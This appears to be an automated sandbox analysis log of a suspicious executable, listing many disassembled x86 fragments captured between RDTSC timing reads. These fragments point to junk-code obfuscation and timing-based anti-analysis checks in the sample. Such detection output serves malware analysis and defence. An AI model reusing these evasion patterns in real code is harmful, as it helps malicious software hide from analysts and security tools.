              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AD4E4 second address: 3AD51E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jbe 00007F5E68513426h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F5E68513438h 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 jmp 00007F5E6851342Ah 0x0000001b mov eax, dword ptr [eax] 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AD51E second address: 3AD522 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AD522 second address: 3AD531 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 je 00007F5E68513426h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AD531 second address: 3AD555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007F5E68E41F21h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AD5AA second address: 3AD5F3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov dword ptr [ebp+122D1CEEh], esi 0x00000011 push 00000000h 0x00000013 je 00007F5E6851343Fh 0x00000019 call 00007F5E68513436h 0x0000001e push ecx 0x0000001f pop edx 0x00000020 pop ecx 0x00000021 call 00007F5E68513429h 0x00000026 je 00007F5E68513438h 0x0000002c push eax 0x0000002d push edx 0x0000002e jnp 00007F5E68513426h 0x00000034 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AD5F3 second address: 3AD653 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5E68E41F16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jne 00007F5E68E41F20h 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 jmp 00007F5E68E41F28h 0x0000001a mov eax, dword ptr [eax] 0x0000001c jmp 00007F5E68E41F20h 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F5E68E41F20h 0x0000002d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AD653 second address: 3AD6E1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [ebp+122D1825h], eax 0x0000000e jmp 00007F5E68513436h 0x00000013 push 00000003h 0x00000015 add ecx, 47E9FFF3h 0x0000001b push 00000000h 0x0000001d mov si, ax 0x00000020 push 00000003h 0x00000022 cmc 0x00000023 call 00007F5E68513429h 0x00000028 jmp 00007F5E68513439h 0x0000002d push eax 0x0000002e push esi 0x0000002f push edi 0x00000030 jmp 00007F5E68513432h 0x00000035 pop edi 0x00000036 pop esi 0x00000037 mov eax, dword ptr [esp+04h] 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F5E68513439h 0x00000044 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AD6E1 second address: 3AD6E7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AD6E7 second address: 3AD6FB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5E68513428h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AD6FB second address: 3AD6FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AD6FF second address: 3AD718 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E68513435h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AD718 second address: 3AD71E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AD71E second address: 3AD722 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AD7C5 second address: 3AD7DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E68E41F24h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AD7DD second address: 3AD819 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E68513439h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c sub dword ptr [ebp+122D1825h], ecx 0x00000012 push 00000000h 0x00000014 xor dword ptr [ebp+122D1BB5h], ebx 0x0000001a call 00007F5E68513429h 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AD819 second address: 3AD81F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AD81F second address: 3AD824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AD824 second address: 3AD82A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AD82A second address: 3AD82E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CD812 second address: 3CD860 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5E68E41F1Fh 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F5E68E41F1Eh 0x0000000f popad 0x00000010 push ecx 0x00000011 jns 00007F5E68E41F16h 0x00000017 pushad 0x00000018 popad 0x00000019 pop ecx 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f jmp 00007F5E68E41F29h 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CD860 second address: 3CD86A instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5E6851342Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CD9B8 second address: 3CD9BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CE375 second address: 3CE3A8 instructions: 0x00000000 rdtsc 0x00000002 je 00007F5E68513426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jl 00007F5E68513426h 0x00000011 je 00007F5E68513426h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F5E68513439h 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CE3A8 second address: 3CE3AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CE50F second address: 3CE520 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F5E68513426h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CE520 second address: 3CE524 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CE7CA second address: 3CE7CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CE7CF second address: 3CE80E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F5E68E41F1Ch 0x00000008 pushad 0x00000009 popad 0x0000000a pop edi 0x0000000b je 00007F5E68E41F18h 0x00000011 push edx 0x00000012 pop edx 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F5E68E41F1Eh 0x0000001c jmp 00007F5E68E41F23h 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CE80E second address: 3CE815 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CE98D second address: 3CE9AF instructions: 0x00000000 rdtsc 0x00000002 je 00007F5E68E41F2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CE9AF second address: 3CE9B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CF176 second address: 3CF17C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CF17C second address: 3CF185 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CF185 second address: 3CF18F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F5E68E41F16h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CF18F second address: 3CF197 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 396347 second address: 396354 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 396354 second address: 396367 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push edx 0x00000008 pushad 0x00000009 jnl 00007F5E68513426h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D5F5A second address: 3D5F79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E68E41F26h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D5F79 second address: 3D5F93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edi 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edi 0x0000000b popad 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 jng 00007F5E68513428h 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A55BA second address: 3A5602 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E68E41F24h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 jmp 00007F5E68E41F1Eh 0x00000017 push edx 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pushad 0x0000001b jmp 00007F5E68E41F22h 0x00000020 push ebx 0x00000021 pop ebx 0x00000022 popad 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A5602 second address: 3A561E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E68513432h 0x00000007 js 00007F5E6851342Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3DDDB3 second address: 3DDDBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F5E68E41F16h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3DDDBD second address: 3DDDDD instructions: 0x00000000 rdtsc 0x00000002 je 00007F5E68513426h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F5E68513431h 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3DD275 second address: 3DD293 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007F5E68E41F16h 0x0000000d jmp 00007F5E68E41F21h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3DD293 second address: 3DD2AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E68513433h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3DD46B second address: 3DD47F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E68E41F20h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E19F0 second address: 3E19FA instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5E68513426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E206F second address: 3E2073 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E216C second address: 3E2178 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E2178 second address: 3E2183 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F5E68E41F16h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E2183 second address: 3E2189 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E27A1 second address: 3E27AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop esi 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E27AD second address: 3E27B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F5E68513426h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E2A46 second address: 3E2A4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E32AD second address: 3E330F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E68513439h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push eax 0x0000000f call 00007F5E68513428h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc eax 0x00000022 push eax 0x00000023 ret 0x00000024 pop eax 0x00000025 ret 0x00000026 mov si, 621Fh 0x0000002a push 00000000h 0x0000002c adc si, 2C46h 0x00000031 push 00000000h 0x00000033 mov edi, dword ptr [ebp+122D1C55h] 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F5E6851342Dh 0x00000043 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E330F second address: 3E3329 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E68E41F26h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E3329 second address: 3E3330 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E4D0F second address: 3E4D19 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5E68E41F1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E4D19 second address: 3E4D33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F5E6851342Ah 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jne 00007F5E68513426h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E4D33 second address: 3E4D39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E4D39 second address: 3E4D4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5E6851342Eh 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E4D4F second address: 3E4D5F instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5E68E41F16h 0x00000008 js 00007F5E68E41F16h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E4D5F second address: 3E4D87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F5E68513426h 0x00000009 js 00007F5E68513426h 0x0000000f jmp 00007F5E68513434h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E4D87 second address: 3E4D8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E53E1 second address: 3E53E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E65B3 second address: 3E65B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E65B7 second address: 3E65D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jnp 00007F5E68513426h 0x0000000d pop edi 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jc 00007F5E68513426h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E65D2 second address: 3E65D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E65D7 second address: 3E65DC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E65DC second address: 3E6644 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov edi, 4D4A3163h 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007F5E68E41F18h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 sub dword ptr [ebp+122D1D6Ch], esi 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push edi 0x00000034 call 00007F5E68E41F18h 0x00000039 pop edi 0x0000003a mov dword ptr [esp+04h], edi 0x0000003e add dword ptr [esp+04h], 00000019h 0x00000046 inc edi 0x00000047 push edi 0x00000048 ret 0x00000049 pop edi 0x0000004a ret 0x0000004b sub dword ptr [ebp+122D1D6Ch], esi 0x00000051 push eax 0x00000052 pushad 0x00000053 pushad 0x00000054 push ebx 0x00000055 pop ebx 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E6644 second address: 3E664C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E7B1E second address: 3E7B36 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jno 00007F5E68E41F16h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jc 00007F5E68E41F20h 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E9AE0 second address: 3E9AEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F5E68513426h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E9AEA second address: 3E9B10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E68E41F1Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F5E68E41F20h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EC716 second address: 3EC71A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EC71A second address: 3EC720 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EC720 second address: 3EC73E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 je 00007F5E68513426h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F5E6851342Ch 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EC73E second address: 3EC74C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F5E68E41F16h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EC891 second address: 3EC89B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3ED883 second address: 3ED891 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E68E41F1Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EC89B second address: 3EC89F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EE8DF second address: 3EE8E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3ED891 second address: 3ED89C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F5E68513426h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EF6CE second address: 3EF6DC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F5E68E41F16h 0x0000000e rdtsc
